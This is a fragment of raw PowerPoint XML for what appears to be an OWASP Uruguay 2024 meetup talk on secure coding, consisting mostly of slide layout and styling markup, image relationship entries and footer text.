          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Google Shape;25;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5448" y="6177677"/>
            <a:ext cx="12197448" cy="666739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0038A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26;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134914" y="6326380"/>
            <a:ext cx="20071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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>owasp.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>uruguay</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 2" descr="La Meetup 2024 | OWU Uruguay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B06E2F7-036E-8BCB-8D31-4A8278AA9AB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25720" y="5684808"/>
            <a:ext cx="1662139" cy="16621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userDrawn="1">
  <p:cSld name="OBJECT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 54"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>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Calibri"/>
              <a:buNone/>
              <a:defRPr b="1" i="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es-UY" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;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lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="0" marR="0" lvl="5" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" marR="0" lvl="6" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" marR="0" lvl="7" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" marR="0" lvl="8" indent="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254000" y="6283021"/>
            <a:ext cx="115824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owasp.org</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;25;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B4F571A-B6A4-E530-9B61-9ABA8DABC1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5448" y="6177677"/>
            <a:ext cx="12197448" cy="666739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0038A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6;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4355F8-660A-D164-9843-B5B7E4DA7566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134914" y="6326380"/>
            <a:ext cx="20071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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>owasp.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>uruguay</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2416961-7AA9-E1C4-68E8-64B2081CD6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1644650"/>
            <a:ext cx="10515600" cy="441007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UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="La Meetup 2024 | OWU Uruguay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B59A5AD-F43A-826F-FEAD-05F10D2BEC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25720" y="5684808"/>
            <a:ext cx="1662139" cy="16621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6" name="Google Shape;66;p5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7" name="Google Shape;67;p5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rgbClr val="1D7BD7"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D7BD7"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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lang="es-UY" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p5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atin typeface="+mn-l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es-UY" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p5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rgbClr val="1D7BD7"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D7BD7"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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lang="es-UY" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;70;p5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atin typeface="+mn-l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es-UY" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;25;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F610B6-EA11-D891-B7B5-938B1EDA952A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5448" y="6177677"/>
            <a:ext cx="12197448" cy="666739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0038A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6;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D42B5A-E790-F390-7FA2-604501853713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134914" y="6326380"/>
            <a:ext cx="20071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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>owasp.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>uruguay</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="La Meetup 2024 | OWU Uruguay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B743699-9991-5E94-FEED-14DE68E4E11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25720" y="5684808"/>
            <a:ext cx="1662139" cy="16621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7" name="Google Shape;77;p54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>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 name="Google Shape;25;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF13FB10-31BB-63D6-EDCE-5534F356790E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5448" y="6177677"/>
            <a:ext cx="12197448" cy="666739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0038A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26;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D26080A4-324B-6616-661C-C8CE06B4101E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134914" y="6326380"/>
            <a:ext cx="20071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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>owasp.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>uruguay</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="La Meetup 2024 | OWU Uruguay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D491D9B-C9CC-87A3-C972-139AD329788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25720" y="5684808"/>
            <a:ext cx="1662139" cy="16621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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="365129"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201"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lang="es-UY" noProof="0"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lang="es-UY" sz="4400" b="1" i="0" u="none" strike="noStrike" cap="none" noProof="0" dirty="0">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3.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emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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1.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10"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12.sv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emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.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4.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.sv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5.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31.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30.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29.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.sv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6.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId12"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34.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId9"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14.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.svg"/><Relationship Id="rId12"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22.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.svg"/><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44.svg"/><Relationship Id="rId1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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.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7.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3.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4.sv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hyperlink" Target="http://ip:8081/"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openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/vectors/icon-file-extension-document-2488093/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/knight-crusader-isolated-2939429/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/board-card-chip-computer-data-22098/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/children-win-success-video-game-593313/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/woman-laptop-business-blogging-3190829/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/house-keys-key-the-door-castle-1407562/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/question-mark-hand-drawn-solution-2123969/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/coding-computer-hacker-hacking-1841550/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/code-programming-love-computer-3078609/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/europe-gdpr-data-privacy-3256079/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixabay.com/photos/black-board-chalk-traces-school-1072366/"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85.png"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.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TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B916388-0A74-FC7F-34FC-C29ED576D90B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2659559"/>
            <a:ext cx="7388300" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Licencia Creative Commons Reconocimiento-NoComercial-CompartirIgual 4.0  Internacional (CC BY-NC-SA 4.0) – Conogasi">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF06C01C-A090-B04D-C5A4-4987D9F4E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6309" y="5357445"/>
            <a:ext cx="1215691" cy="5194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F9C05BF-7384-00AE-1CAE-196B71DF62D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144118" y="2659559"/>
            <a:ext cx="4429093" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
